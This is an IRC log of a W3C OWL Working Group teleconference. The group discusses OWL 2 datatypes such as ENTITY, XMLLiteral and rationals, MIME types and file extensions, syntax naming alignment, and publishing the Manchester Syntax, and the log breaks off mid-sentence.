Zakim, ??P11 is me 17:59:44 <Zakim> +bmotik; got it 17:59:47 <bmotik> Zakim, mute me 17:59:47 <Zakim> bmotik should now be muted 18:00:54 <Zakim> + +1.617.452.aabb 18:01:11 <baojie> baojie has joined #owl 18:01:13 <Zakim> +??P14 18:01:17 <alanr_> zakim, aabb is me 18:01:17 <Zakim> +alanr_; got it 18:01:21 <uli> zakim, ??P14 is me 18:01:21 <Zakim> +uli; got it 18:01:23 <alanr_> zakim, who is here? 18:01:23 <Zakim> On the phone I see Peter_Patel-Schneider, MarkusK_, Ivan, +1.518.276.aaaa, josb, bmotik (muted), alanr_, uli 18:01:25 <Zakim> On IRC I see baojie, alanr_, josb, bmotik, uli, ivan, MarkusK_, schneid, RRSAgent, Zakim, clu, alanr, sandro, trackbot 18:01:25 <uli> zakim, mute me 18:01:25 <Zakim> uli should now be muted 18:01:34 <baojie> Zakim, aaaa is me 18:01:34 <Zakim> +baojie; got it 18:02:19 <Zhe> Zhe has joined #owl 18:02:42 <Zakim> +Sandro 18:02:53 <Zakim> +Zhe 18:03:00 <sandro> zakim, who is on the call? 18:03:00 <Zakim> On the phone I see Peter_Patel-Schneider, MarkusK_, Ivan, baojie, josb, bmotik (muted), alanr_, uli (muted), Sandro, Zhe 18:03:42 <Zakim> + +0494212186aacc 18:03:56 <clu> zakim, aacc is me 18:03:56 <Zakim> +clu; got it 18:04:00 <clu> zakim, mute me 18:04:00 <Zakim> clu should now be muted 18:04:16 <bcuencagrau> bcuencagrau has joined #owl 18:04:20 <Zakim> +wonsuk 18:04:33 <msmith> msmith has joined #owl 18:04:39 <alanr_> zakim, who is here? 18:04:39 <Zakim> On the phone I see Peter_Patel-Schneider, MarkusK_, Ivan, baojie, josb, bmotik (muted), alanr_, uli (muted), Sandro, Zhe, clu (muted), wonsuk 18:04:41 <Zakim> On IRC I see msmith, bcuencagrau, Zhe, baojie, alanr_, josb, bmotik, uli, ivan, MarkusK_, schneid, RRSAgent, Zakim, clu, sandro, trackbot 18:04:50 <schneid> zakim, wonsuk is me 18:04:59 <Zakim> +schneid; got it 18:05:03 <schneid> zakim, mute me 18:05:10 <Zakim> +??P20 18:05:15 <bcuencagrau> Zakim, ??P20 is me 18:05:19 <alanr_> zakim, who is here 18:05:22 <Zakim> schneid should now be muted 18:05:25 <alanr_> zakim, who is here? 18:05:30 <Zakim> +bcuencagrau; got it 18:05:31 <Rinke> Rinke has joined #owl 18:05:34 <Zakim> alanr_, you need to end that query with '?' 18:05:36 <bcuencagrau> Zakim, mute me 18:05:40 18:05:51 <MarkusK_> Scribe: MarkusK_ 18:05:53 <Zakim> bcuencagrau should now be muted 18:05:57 <Zakim> On IRC I see Rinke, msmith, bcuencagrau, Zhe, baojie, alanr_, josb, bmotik, uli, ivan, MarkusK_, schneid, RRSAgent, Zakim, clu, sandro, trackbot 18:06:02 <MarkusK_> Topic: Admin 18:06:05 <uli> Alan, you are very quiet 18:06:07 <Rinke> ScribeNick: MarkusK_ 18:06:09 <Zakim> +msmith 18:06:23 <MarkusK_> Alan: Last minute agenda extension regarding question on XML literals 18:06:28 <MarkusK_> Previous minutes 18:06:40 <alanr_> zakim is slow 18:06:52 <Zakim> +Tom 18:06:54 <alanr_> 18:06:57 <Rinke> zakim, Tom is me 18:06:57 <Zakim> +Rinke; got it 18:07:05 <msmith> last week's minutes looked ok to me 18:07:36 <MarkusK_> Alan: I did mechanical cleanup on F2F4 2nd day minutes 18:07:42 <pfps> pfps has joined #owl 18:07:57 <MarkusK_> Alan: Contents should be in better shape now 18:08:19 <MarkusK_> Alan: Anyone looked at last week's minutes? 18:08:27 <MarkusK_> Pfps: Yes, they appear to be ok 18:08:46 <uli> something is causing static noise 18:09:01 <MarkusK_> Proposed: Accept minutes of Nov 5 Telco 18:09:22 <MarkusK_> Accepted: Accept minutes of Nov 5 Telco 18:09:36 <pfps> I haven't had a chance to look at the F2F4 minutes since yesterday 18:09:37 <Zakim> +[IBM] 18:09:53 <Achille> Achille has joined #owl 18:09:58 <Achille> Zakim, IBM is me 18:09:58 <Zakim> +Achille; got it 18:10:10 <MarkusK_> Action item status 18:10:10 <trackbot> Sorry, couldn't find user - item 18:10:22 <msmith> I updated the action, it was actually done by markus k 18:10:36 <MarkusK_> Action 243 completed 18:10:36 <trackbot> Sorry, couldn't find user - 243 18:10:59 <sandro> action-243 closed 18:10:59 <trackbot> ACTION-243 Edit test section of test & conf to include two links and explanatory text closed 18:11:00 <MarkusK_> Alan: I completed Action 242 18:11:19 <sandro> zakim, who is on the call? 18:11:19 (muted), msmith, 18:11:22 <Zakim> ... Rinke, Achille 18:11:23 <MarkusK_> Topic: Reviewing and Publishing 18:11:23 <MarkusK_> SubTopic: OWL2 Datatypes 18:11:31 <MarkusK_> Alan: Jos de Bruijn is joining OWL WG to look at issues related to datatypes, esp. regarding RIF-OWL compatibility. 18:11:38 <JeffP> JeffP has joined #owl 18:12:11 <josb> 18:12:24 <JeffP> {JeffP am only available on IRC) 18:12:28 <MarkusK_> Jos: We have a certain set of required datatypes in RIF. These are required, but you are free to implement further datatypes. The conformance conditions of RIF require that only the required datatypes are implemented but conformance can be parameterized to include further datatypes. Now OWL requires much more datatypes than RIF, so the extended conformance conditions would apply. 18:14:01 <bmotik> +q 18:14:10 <bmotik> Zakim, unmute me 18:14:10 <Zakim> bmotik should no longer be muted 18:13:30 <sandro> ID, IDREF, ENTITY 18:14:15 <MarkusK_> Jos: I was surprised to see the datatypes ID, IDREF, ENTITY being included in OWL since they were partly discouraged by WebOnt. 18:14:18 <alanr_> ack bmotik 18:14:34 <msmith> Where in the RIF documents is the description of conformance? 18:14:37 <MarkusK_> Boris: I can try to explain. The datatypes ID, IDREF, ENTITY essentially are just restricted types of strings. They have no relation to documents or anything so things are done like in XML Schema. 18:15:35 <schneid> RDF Semantics document tells people they should not use xsd:ENTITY and such: <> 18:15:42 <MarkusK_> Boris: Those particular special forms of strings should not cause problems since they are not relatvie to a document. 18:15:46 <sandro> boris: We understand ID, IDREF, and ENTITY to just be subtypes of string with a restricted syntax. This is how they are done in XML Schema. They are just strings with additional restrictions. 18:16:00 <josb> 18:16:10 <MarkusK_> Jos: I think at least ENTITY seems to point to a document (see link pasted). 18:16:32 <MarkusK_> Boris: (reads from linked text) 18:16:34 <pfps> q+ 18:16:40 <MarkusK_> Boris: Indeed, it mentions a document. I had not noticed this; this was not the intention in OWL. I will check version 1.1 of the spec. 18:16:38 <msmith> 18:16:52 <alanr_> says same thing in 1.1 18:17:00 <pfps> the 1.1 document appears to be incoherent 18:17:27 <Zakim> -uli 18:17:32 <MarkusK_> Jos: The intended interpretation is that entities need to be distinguished when taking the union of two documents. 18:17:41 <MarkusK_> Boris: this was not intended in OWL. Anything beyond simple strings would be out of scope. 18:17:52 <Zakim> +??P14 18:18:00 <uli> zakim, ??P14 is me 18:18:00 <Zakim> +uli; got it 18:18:10 <uli> zakim, mute me 18:18:10 <Zakim> uli should now be muted 18:18:26 <sandro> q? 18:18:31 <MarkusK_> Jos: Why was this a concern for WebOnt and RDF but not for OWL? 18:18:38 <josb> 18:19:21 <MarkusK_> Jos: this link is relevant to the discussion of ENTITIY. 18:19:22 <pfps> q+ to ask why we are doing this sort of thing at a teleconference 18:19:32 <msmith> rdf-mt says, "xsd:QName and xsd:ENTITY require an enclosing XML document context" 18:19:40 <MarkusK_> Jos: Both RDF and OWL discourage the use of this type, pointing to this section. 18:19:42 <alanr_> ack pfps 18:19:42 <Zakim> pfps, you wanted to ask why we are doing this sort of thing at a teleconference 18:19:59 <josb> 18:20:05 <schneid> +1 to PFPS 18:20:13 <MarkusK_> Pfps: Should this be discussed during the current telco? We are not sufficiently prepared. Let us take this to Email. 18:20:37 <schneid> I just stumbled over the RDFS paragraph a few days ago, not related to this discussion. 18:20:38 <MarkusK_> Sandro: It seemed to be an urgent issue that needed some discussion. 18:21:01 <MarkusK_> Alan: Should we simply remove the problematic types then? Or is anybody interested in having them? 18:20:56 <schneid> q+ 18:20:58 <pfps> I'm perfectly happy to junk them 18:21:00 <uli> I would think that this would be too rushed 18:21:01 <schneid> zakim, unmute me 18:21:01 <Zakim> schneid should no longer be muted 18:22:32 <alanr_> ack schneid 18:21:28 <MarkusK_> Schneid: I would feel incomfortable with keeping these datatypes in, because RDFS semantics says SHOULD NOT be used, while RDF-based Semantics would have it in its datatype map. 18:21:25 <msmith> I think junking them is ok, but suggest that proposal go to the list and be resolved next week. 18:21:33 <uli> +1 to Mike 18:21:37 <schneid> zakim, mute me 18:21:37 <Zakim> schneid should now be muted 18:21:48 <ivan> +1 18:21:49 <uli> yes 18:21:50 <JeffP> +1 to Mike 18:21:55 <MarkusK_> Alan: Then we can discuss this over email and schedule a proposal for next week. 18:22:14 <MarkusK_> Subtopic: XMLLiteral in OWL 2 18:22:14 <MarkusK_> Jos: XMLLiteral is a datatype not included in OWL 2, but required in RDF; in OWL 1 it was built-in. Is it a mistake that it is not in OWL 2? 18:22:16 <pfps> q+ 18:22:23 <pfps> q+ on a point of order 18:22:25 <bmotik> q+ 18:23:54 <ivan> ack pfps 18:23:54 <Zakim> pfps, you wanted to comment on a point of order 18:23:04 <MarkusK_> Pfps: A link in the agenda is not accessible without a login. 18:23:12 <MarkusK_> Sandro: Sorry, I will fix this. 18:23:32 <MarkusK_> Pfps: What good can we do with this discussion now? I am clueless. More preparation would be useful. 18:24:07 <MarkusK_> Sandro: OK, but maybe Jos can still bring forward what the issue is, and then we can possibly move on. 18:24:10 <msmith> +1 to adding XMLLiteral if we can. 18:24:15 <ivan> XMLLiteral is not an xsd datatype 18:24:39 <MarkusK_> Boris: The only normative types in OWL 1.0 are strings and integers; I overlooked the XMLLiteral type. 18:24:41 <schneid> XMLLiteral is in the RDF namespace 18:24:53 <schneid> q+ 18:24:58 <schneid> zakim, unmute me 18:24:58 <Zakim> schneid was not muted, schneid 18:24:58 <ivan> XMLLiteral is (the only) datatype defined in RDF 18:24:59 <alanr_> ack bmotik 18:25:06 <bmotik> ACTION: bmotik2 to Come up with an analysis of whether OWL 2 should include XMLLiteral 18:25:06 <trackbot> Created ACTION-244 - Come up with an analysis of whether OWL 2 should include XMLLiteral [on Boris Motik - due 2008-11-19]. 18:25:07 <josb> I would expect an answer to my public comment to be an outcome of the action 18:25:10 <MarkusK_> Alan: We should come up with a proposal whether or not to include XMLLiteral in OWL 2 18:25:34 <josb> rdf:XMLLiteral spec: 18:25:38 <MarkusK_> Schneid: XMLLiteral is mandatory in RDF and thus it is mandatory for the RDF-based semantics. I do not see why it is required for DL datatype maps though. XMLLiteral is already covered for OWL 2 Full. 18:28:16 <schneid> rdf:XMLLiteral in RDF Semantics: <> 18:25:45 <alanr_> q? 18:25:49 <schneid> zakim, mute me 18:25:49 <Zakim> schneid should now be muted 18:25:50 <alanr_> acm schneid 18:25:52 <ivan> q? 18:25:54 <alanr_> ack schneid 18:26:01 <bmotik> Zakim, mute me 18:26:01 <Zakim> bmotik should now be muted 18:26:29 <bmotik> -q 18:26:35 <bmotik> Zakim, unmute me 18:26:35 <Zakim> bmotik should no longer be muted 18:26:38 <MarkusK_> Thanks to Jos for attending, bye 18:26:43 <Zakim> -josb 18:26:48 <JeffP> bye 18:22:14 <MarkusK_> Subtopic: Progress report on document changes 18:27:09 <sandro> Boris: my parts of to be done by the end of the week 18:27:29 <MarkusK_> Alan: I also noticed a link at the end where the full grammar should be 18:27:32 <schneid> Ivan, several of the RDF semantic conditions are about rdf:XMLLiteral 18:27:35 <MarkusK_> Boris: I can fix this too. 18:27:57 <MarkusK_> Alan: Some remaining changes seems to be more than editorial 18:28:16 <MarkusK_> Boris: Yes, the original reviewers should be asked to look over it again after I finish. I will send a pointer by email. 18:28:27 <alanr_> q? 18:28:35 <MarkusK_> Sandro: I will provide a color-coded diff then. 18:28:45 <bmotik> Zakim, mute me 18:28:45 <Zakim> bmotik should now be muted 18:29:02 <MarkusK_> Subtopic: Mime types 18:29:11 <sandro> 18:29:28 <sandro> q? 18:29:29 <MarkusK_> Alan: Peter's email suggested mime types for functional and Manchester syntax. There are still question marks for XML syntax. 18:29:57 <sandro> q+ 18:30:14 <MarkusK_> Alan: Do we still need to specify file extensions? 18:30:24 <MarkusK_> Pfps: I assume that file extensions should be specified. A three-character extension might be good. It should be possible to find un-occupied 3-char extensions. I propose oxl or just xml for XML syntax. 18:31:51 <MarkusK_> Sandro: I think it could be xml, but I need to check. 18:32:11 <MarkusK_> For RDF/XML the extension is rdf. 18:32:29 <MarkusK_> Alan: So the choice is between oxl and xml? 18:32:29 <alanr_> owx 18:32:31 <sandro> .xml or .oxl (.owx) 18:32:33 <MarkusK_> Pfps: Yes 18:32:40 <MarkusK_> Sandro: owx is another option 18:33:06 <MarkusK_> Action: Sandro to check if it would be recommendable to use xml as file extension for XML syntax files. 18:33:06 <trackbot> Created ACTION-245 - Check if it would be recommendable to use xml as file extension for XML syntax files. [on Sandro Hawke - due 2008-11-19]. 18:33:09 <ivan> good point 18:33:27 <MarkusK_> Alan: Using xml might cause confusion with some tools, e.g. Protege. 18:33:58 <MarkusK_> Sandro: Also web servers might like to have a separate extension for serving the right mime type. 18:34:14 <MarkusK_> Alan: Then we should probably not consider xml. 18:34:14 <sandro> action-245 closed 18:34:14 <trackbot> ACTION-245 Check if it would be recommendable to use xml as file extension for XML syntax files. closed 18:34:24 <MarkusK_> Pfps: ok 18:34:26 <Rinke> oxl = OMEGA Product Suite File 18:34:27 <ivan> toss a coin 18:34:29 <MarkusK_> Sandro: ok 18:34:31 <sandro> owx 18:34:45 <MarkusK_> Alan: So the choice is between owx and oxl. 18:35:10 <msmith> Does mime registration limit us to 3 characters? 18:35:22 <sandro> No, but some people prefer it. 18:35:37 <Rinke> ... and some filesystems do as well 18:35:43 <MarkusK_> Alan: There appears to be a file type for oxl but none for owx, which might support the latter. Peter, do you like owx? 18:35:57 <JeffP> xol? 18:36:04 <ivan> owx it is! 18:36:07 <MarkusK_> Pfps: I don't care. 18:36:17 <Zhe> owx is not bad 18:36:32 <MarkusK_> Alan: Ok, then let us use owx. 18:36:48 <MarkusK_> Pfps: I will edit all relevant documents to mirror this choice. 18:37:02 <ivan> :-) 18:37:16 <MarkusK_> Sandro: Could we fix who will contact IETF for registering the mime types? 18:38:13 <sandro> q? 18:38:15 <sandro> q- 18:38:30 <MarkusK_> Subtopic: Alignment of functional syntax keywords and RDF syntax URIs 18:38:41 <MarkusK_> (Sandro takes over chairing) 18:39:09 <MarkusK_> Alan: The action was to have a smaller group of people to work-out a proposal. It might be good to have another week for a coherent proposal. 18:39:59 <pfps> q+ 18:40:08 <sandro> ack pfps 18:40:18 <MarkusK_> 18:40:27 <ivan> q+ 18:41:07 <alanr_> q+ 18:41:13 <alanr_> ack ivan 18:41:17 <MarkusK_> Ivan: One option for solving the dealock would be to not do any change. 18:41:41 <pfps> there are a couple of suggestions that don't seem to have much, if any, pushback 18:42:09 <bmotik> I'm afraid that the only noncontentious thing is ExistsSelf 18:42:26 <sandro> STRAWPOLL: Should we put effort into aligning the functional syntax and RDF names? 18:42:29 <bmotik> -1 18:42:32 <ivan> +1 18:42:32 <bcuencagrau> -1 18:42:32 <alanr_> +1 18:42:35 <sandro> +1 18:42:38 <pfps> -1 18:42:44 <MarkusK_> 0 18:42:44 <schneid> -0 18:42:44 <msmith> 0 18:42:45 <JeffP> 0 18:42:48 <uli> -0 18:42:51 <Zhe> +1 consistency is always a good thing 18:42:53 <Rinke> +0.5 18:42:59 <Achille> 0 18:43:28 <sandro> baojie? opinion? 18:43:33 <schneid> consequently, one could then also ask for aligning the Manchester Syntax... 18:43:43 <Rinke> I don't really think differences in singular vs plural form are a problem 18:43:44 <pfps> there are various different kinds of consistency that could be aimed for here. The current status is for a particular kind of consistency. 18:43:51 <bmotik> +q 18:43:58 <ivan> ack alanr_ 18:44:02 <sandro> q? 18:44:05 <bmotik> Zakim, unmute me 18:44:05 <Zakim> bmotik should no longer be muted 18:44:05 <sandro> ack bmotik 18:44:09 <MarkusK_> Sandro: If there was no effort involved, would there be objections changing the names? 18:44:34 <baojie> sorry, was off for a few minutes, I would vote +1 18:44:24 <MarkusK_> Boris: I voted with -1. In an ideal world, it would be great to have that alignment but in practice, forcing an alignment would make the functional syntax ugly. For instance, we do have singular names in RDF where we have n-ary constructs in functional-style syntax. Given that we cannot change RDF, I believe that the alignment is not practical. 18:44:46 <alanr_> q+ 18:44:56 <sandro> boris: In an ideal world, yes, we'd like the same names. But the RDF syntax takes precidence, so the function syntax would start to get very ugly. 18:45:29 <sandro> boris: If we were designing two syntax from scratch, then sure, align them. 18:45:40 <sandro> boris: but since we can't change RDF, let's not make functional ugly. 18:45:41 <sandro> q? 18:45:43 <bcuencagrau> +q 18:45:45 <sandro> ack alanr_ 18:45:46 <bmotik> Zakim, mute me 18:45:46 <Zakim> bmotik should now be muted 18:46:23 <sandro> alan: let's accept plurality issues, but try to solve the other? 18:46:30 <MarkusK_> Alan: Maybe one could focus on alignments that are less problematic than the plurals/singulars. There are other issues that could possibly be changed with less effort. I will suggest this in an email. 18:46:38 <ivan> q+ 18:46:57 <sandro> ack bcuencagrau 18:46:57 <bcuencagrau> Zakim, unmute me 18:47:00 <Zakim> bcuencagrau was not muted, bcuencagrau 18:47:24 <msmith> q+ to mention the OWL XML schema 18:47:27 <MarkusK_> Bernardo: Do you then only suggest to change some names? I agree with Boris. We have a nice and well-developed functional syntax now. It has been developed for quite some time, and I would not like to implement major changes there now. 18:47:52 <sandro> q? 18:47:53 <alanr_> q+ 18:48:06 <sandro> ack ivan 18:48:12 <bcuencagrau> Zakim, mute me 18:48:12 <Zakim> bcuencagrau should now be muted 18:48:44 <MarkusK_> Ivan: I also see that the complete alignment appears to be unrealistic. We only arrived at consensus in a few cases, while most of the namings remained disputed. Still there is a problem in understanding OWL 2 for people coming to OWL from the RDF world. A possible answer of course is that people from the DL world would prefer the current namings over the RDF-compatible ones. But changing only two or three names seems not to solve the problem anyway, so we might just avoid this extra work. 18:49:19 <bcuencagrau> +q 18:49:25 <bmotik> +q 18:50:27 <sandro> ack msmith 18:50:27 <Zakim> msmith, you wanted to mention the OWL XML schema 18:51:00 <ivan> +1 to msmith 18:51:09 <sandro> ack alanr_ 18:51:11 <MarkusK_> MikeSmith: Note that the functional syntax is also aligned with the OWL XML syntax. Any change in the names would thus also affect the XML syntax. 18:51:08 <schneid> of course, every change in the FS would need to be followed by OWL/XML 18:51:17 <bcuencagrau> Zakim, unmute me 18:51:17 <Zakim> bcuencagrau should no longer be muted 18:52:06 <MarkusK_> Sandro: Many people may arrive at OWL as an extension of RDF and those people should be supported. 18:52:25 <sandro> q? 18:52:29 <sandro> ack bcuencagrau 18:52:48 <MarkusK_> Sandro: An editorial improvement could be to (scribe did not get this, sorry) 18:53:01 <pfps> q+ 18:53:05 <pfps> q- 18:53:10 <sandro> Alan: We could xref the function syntax to the RDF vocabulary, as an editorial fix. 18:53:13 <bmotik> Zakim, unmute me 18:53:13 <Zakim> bmotik should no longer be muted 18:53:13 <MarkusK_> Bernardo: One way to move forward would be to check if there are comments from the community after publishing the documents. So we may want to wait for comments before starting major changes. 18:53:33 <bcuencagrau> Zakim, mute me 18:53:33 <Zakim> bcuencagrau should now be muted 18:53:36 <sandro> ack bmotik 18:53:48 <MarkusK_> Sandro: The downside would be that this may require a second last call. 18:54:26 <MarkusK_> Boris: We should keep in mind that OWL is indeed serving two partially overlapping communities. I am not convinced that changing some names would solve the problem that those different approaches bring. And there are various documents addressing the view of the RDF community, including the Primer that shows explicitly how to translate syntactic forms. 18:54:14 <sandro> (Hey, let's have two different languages, with different names! :-) 18:54:38 <sandro> q? 18:55:09 <uli> good points, Boris 18:55:11 <bmotik> Zakim, mute me 18:55:11 <Zakim> bmotik should now be muted 18:55:18 <alanr_> q? 18:56:00 <MarkusK_> Ivan: So how should we continue? 18:56:24 <schneid> we had pretty much a draw in the straw poll, with half of the votes being 0 18:56:34 <MarkusK_> Sandro: This can be discussed on the mailing lists; if not enough people continue to work on this, we need to give up on the alignment. 18:56:45 <MarkusK_> Alan: I will send a mail with some suggestions for discussion 18:56:51 <MarkusK_> Subtopic: Manchester syntax 18:57:08 <MarkusK_> Pfps: Some months ago, I mailed that Manchester syntax is ready for review. There have been some at least partial reviews since then. I have addressed most of those comments, but one major comment resulted in issue-146. 18:58:23 <MarkusK_> Sandro: Any other comments before publishing this? 18:59:11 <MarkusK_> Alan: Some review comments are still in the document, maybe these should be turned into editor's notes. 18:59:31 <MarkusK_> Pfps: I still wait for responses from the authors of some of these comments. 19:00:25 <MarkusK_> Alan: I guess I would like my comments turned into editor's notes without open issues. If Peter agrees with that. 19:01:18 <Rinke> (my two remaining review comments have been addressed, as far as I'm concerned they may be removed) 19:01:23 <MarkusK_> Pfps: For this document there appears to be disagreement between the editor and the reviewers. Keeping the comments as notes will not solve the problem in the end. 19:01:42 <schneid> q+ 19:01:50 <ivan> q+ 19:02:00 <Rinke> I don't have an alternative either 19:02:00 <MarkusK_> Sandro: But we can ask the public for comments on open issues. 19:02:14 <Rinke> yes 19:02:34 <MarkusK_> Pfps: OK, I can turn the comments into editor's notes, and we can then go forward with publication. 19:02:42 <schneid> q- 19:02:57 <sandro> ACTION: Pfps convert review comments to editors notes (except rinke's) 19:02:57 <trackbot> Created ACTION-246 - Convert review comments to editors notes (except rinke's) [on Peter Patel-Schneider - due 2008-11-19]. 19:03:14 <msmith> and in test&conf (responding to the question where to find examples for making editor's notes on the wiki) 19:04:06 <schneid> there's also an EdNote resulting from some open disagreement between the editor and one of the reviewers of the RDF-Based Semantics ... :) 19:03:29 <ivan> q? 19:03:33 <MarkusK_> Sandro: Can we propose to publish? Should publication be as soon as possible or in combination with other publications? 19:04:08 <MarkusK_> Alan: Maybe we can at least resolve now to publish. 19:04:33 <sandro> PROPOSED: Publish ManchesterSyntax as FPWD, after Peter's just-discussed editors notes are added, in our next round of publications. 19:05:29 <MarkusK_> Alan: So "next round" would mean the next time we publish; is this at Last Call? 19:05:36 <MarkusK_> Sandro: Yes, that would be useful. 19:04:40 <bmotik> +1 (Oxford) 19:04:45 <Rinke> +1 (UvA) 19:04:46 <MarkusK_> +1 (FZI) 19:04:48 <pfps> +1 (ALU) 19:04:50 <bcuencagrau> +1 (Oxford) 19:04:53 <Zhe> +1 (ORACLE) 19:04:55 <ivan> +1 (w3c) 19:04:58 <alanr_> +1 19:04:58 <Achille> +1 (IBM) 19:05:11 <sandro> +1 19:05:12 <alanr_> +1 (science commons) 19:05:19 <uli> +1 (Man) 19:05:33 <msmith> +1 (C&P) 19:05:38 <sandro> RESOLVED: Publish ManchesterSyntax as FPWD, after Peter's just-discussed editors notes are added, in our next round of publications. 19:05:42 <baojie> +1 (RPI) 19:05:48 <sandro> ack ivan 19:06:16 <MarkusK_> Ivan: There is one open issue related to the Manchester Syntax; I do not understand what it says. 19:06:31 <MarkusK_> Sandro: This one is on the agenda, maybe we can get to this. 19:06:43 <MarkusK_> Subtopic: Datarange extensions 19:07:24 <MarkusK_> Alan: We have had some reviews, and the question now is if we can make this a publishable WG note. 19:07:12 <bmotik> q+ 19:07:18 <bmotik> Zakim, unmute me 19:07:18 <Zakim> bmotik should no longer be muted 19:07:22 <alanr_> ack bmotik 19:07:45 <MarkusK_> Boris: I think the document is good, but some of the comments need to be addressed. I think all reviewers agreed that this should be published as a note. Some open issues remain, but I do not see why those should not be solvable. 19:07:57 <uli> q+ 19:08:05 <bmotik> Zakim, mute me 19:08:05 <Zakim> bmotik should now be muted 19:08:09 <uli> zakim, unmute me 19:08:09 <Zakim> uli should no longer be muted 19:08:41 <MarkusK_> Uli: We plan to address all the reviewers' comments, but this won't happen by next week. 19:08:55 <uli> zakim, mute me 19:08:55 <Zakim> uli should now be muted 19:09:22 <MarkusK_> Alan: OK; so let us continue to work on this. 19:09:28 <sandro> Alan: consensus seems to be that this is moving along nicely to end up as a Note. 19:09:49 <bmotik> Given this outcome, could we perhaps resolve ISSUE-127 now/soon? 19:10:03 <MarkusK_> Topic: Issues 19:10:12 <sandro> subtopic: issue-127 19:10:29 <MarkusK_> (Alan is back chairing) 19:10:28 <bmotik> +1 to close 19:10:33 <bmotik> q+ 19:10:42 <sandro> ack uli 19:10:43 <alanr_> ack uli 19:10:54 <alanr_> ack bmotik 19:10:56 <bmotik> Zakim, unmute me 19:10:56 <Zakim> bmotik was not muted, bmotik 19:11:01 <ivan> q+ 19:11:02 <uli> zakim, mute me 19:11:02 <Zakim> uli should now be muted 19:11:16 <MarkusK_> Boris: Does anything speak against closing Issue 127? 19:11:43 <bmotik> Zakim, mute me 19:11:43 <Zakim> bmotik should now be muted 19:11:47 <ivan> q- 19:11:55 <schneid> we had /3/ proposals to close this in the last few days, AFAIR :) 19:12:07 <sandro> PROPOSED: Close issue-127 given the work on Data Range Extension is proceeding nicely 19:12:09 <bmotik> +1 19:12:12 <sandro> +1 19:12:13 <alanr_> +1 19:12:13 <msmith> +1 19:12:13 <ivan> +1 19:12:14 <Rinke> +1 19:12:14 <schneid> +1 19:12:14 <MarkusK_> +1 19:12:14 <pfps> +1 19:12:17 <Zhe> +1 19:12:18 <bcuencagrau> +1 19:12:23 <uli> +1 19:12:24 <JeffP> 0 19:12:26 <baojie> +1 19:12:33 <sandro> RESOLVED: Close issue-127 given the work on Data Range Extension is proceeding nicely 19:12:56 <MarkusK_> Subtopic: Issue-87 19:13:08 <MarkusK_> (Sandro is chairing this) 19:13:50 <MarkusK_> Alan: It is considered useful to add rational numbers as a datatype. The question was how this should be realized, and what conformance would require for this datatype. Also it was asked if we should have a dedicated lexical representation for rationals. 19:14:05 <bmotik> q+ 19:14:18 <msmith> q+ 19:14:20 <bmotik> Zakim, unmute me 19:14:20 <Zakim> bmotik should no longer be muted 19:14:23 <sandro> ack bmotik 19:15:17 <MarkusK_> Boris: Regarding the dedicated lexical form, I do not see any problems. There might be some implementation challenges involved. One would probably store rationals as pairs of integers. We do not need arithmetics, since OWL does not include much arithmetics anyway. But comparing floats and rationals might be a slight challenge for implementors. 19:15:28 <alanr_> q+ to mention finite number of floats between rationals 19:16:13 <msmith> q- 19:16:43 <sandro> ack alanr_ 19:16:43 <Zakim> alanr_, you wanted to mention finite number of floats between rationals 19:16:46 <bmotik> Zakim, mute me 19:16:46 <Zakim> bmotik should now be muted 19:16:51 <bcuencagrau> Zakim, mute me 19:16:51 <Zakim> bcuencagrau was already muted, bcuencagrau 19:17:11 <bmotik> q+ 19:17:33 <MarkusK_> Alan: I was also wondering about the comparison. Maybe we should put this in and tag it as an "at risk" feature. There was also a problem relating to counting floats. 19:17:33 <sandro> a? 19:17:36 <sandro> q? 19:17:37 <bmotik> Zakim, unmute me 19:17:37 <Zakim> bmotik should no longer be muted 19:17:42 <sandro> ack bmotik 19:17:54 <schneid> xsd:double just specifies a finite subset of all rationals 19:18:17 <alanr_> q+ 19:18:45 <sandro> ack alanr_ 19:18:46 <MarkusK_> Boris: Yes, but the value space of rationals is dense, i.e. there are infinitely many values between each pair of distinct rational numbers. Even if there are only finitely many constants, the number of rationals is not a problem. 19:19:32 <bmotik> Zakim, mute me 19:19:32 <Zakim> bmotik should now be muted 19:19:33 <MarkusK_> Alan: Yes, but there might e.g. be a data range of floats bounded by rational constants 19:19:58 <MarkusK_> Sandro: This discussion probably should be continued elsewhere. 19:19:41 <msmith> +1 19:19:46 <alanr_> +1 19:20:10 <sandro> STRAWPOLL: go ahead with Rationals in OWL2, marked as At Risk until we get implementation experience 19:20:11 <ivan> +1 (why putting it on the agenda next week?) 19:20:14 <bmotik> +1 19:20:17 <MarkusK_> +1 19:20:17 <baojie> +1 19:20:18 <uli> +1 19:20:19 <pfps> +1 19:20:19 <Achille> +1 19:20:19 <Zhe> +1 19:20:22 <schneid> +1 (even without "at risk") 19:20:23 <alanr_> +1 19:20:23 <bcuencagrau> +1 19:20:24 <Rinke> +1 19:20:29 <JeffP> 0 19:20:49 <bmotik> Perhaps we can come up by the next week with questions that need to be answered in order to remove "at risk" 19:20:55 <MarkusK_> Sandro: It appears to be too early to make this a full resolution, since it was not announced on the agenda. 19:21:06 <ivan> q+ 19:21:12 <sandro> Subtopic: issue-146 19:21:22 <MarkusK_> (Sandro chairing) 19:22:16 <MarkusK_> Sandro: We probably could let this issue sit until we have feedback on Manchester syntax. 19:22:17 <sandro> we're going to let this sit.... 19:22:52 <ivan> q- 19:22:55 <MarkusK_> Ivan: I really do not understand Issue 146. I would like a more detailed explanation via email. 19:23:19 <sandro> ACTION: Alan make a detailed proposal for edits to ManchesterSyntax to address issue-146 - due Jan 15 19:23:19 <trackbot> Created ACTION-247 - make a detailed proposal for edits to ManchesterSyntax to address issue-146 [on Alan Ruttenberg - due 2008-01-15]. 19:23:56 <sandro> Subtopic: deprecated 19:24:08 <sandro> 19:24:18 <bmotik> q+ 19:24:21 <pfps> q+ 19:24:36 <MarkusK_> Alan: Since we have punning, we can no longer distinguish deprecation of properties and classes. A simple way to fix this would be to have two separate annotation properties as deprecation markers: one for classes and one for properties. 19:24:43 <Zakim> -Rinke 19:24:45 <sandro> ack bmotik 19:24:46 <bmotik> Zakim, unmute me 19:24:48 <Zakim> bmotik was not muted, bmotik 19:24:49 <sandro> q? 19:25:04 <pfps> q- 19:25:24 <MarkusK_> Boris: So the suggestion is to have two distinct annotation properties? 19:25:29 <MarkusK_> Alan: Yes. 19:25:48 <ivan> q+ 19:25:51 <schneid> or more: for individuals, classes, datatypes, dataproperties, objectproperties 19:25:54 <sandro> ack ivan 19:25:56 <bmotik> Zakim, mute me 19:25:56 <Zakim> bmotik should now be muted 19:25:57 <MarkusK_> Boris: Isnt't it that you deprecate a URI rather than a particular use/view of it? 19:26:11 <MarkusK_> Alan: No, my intention is to 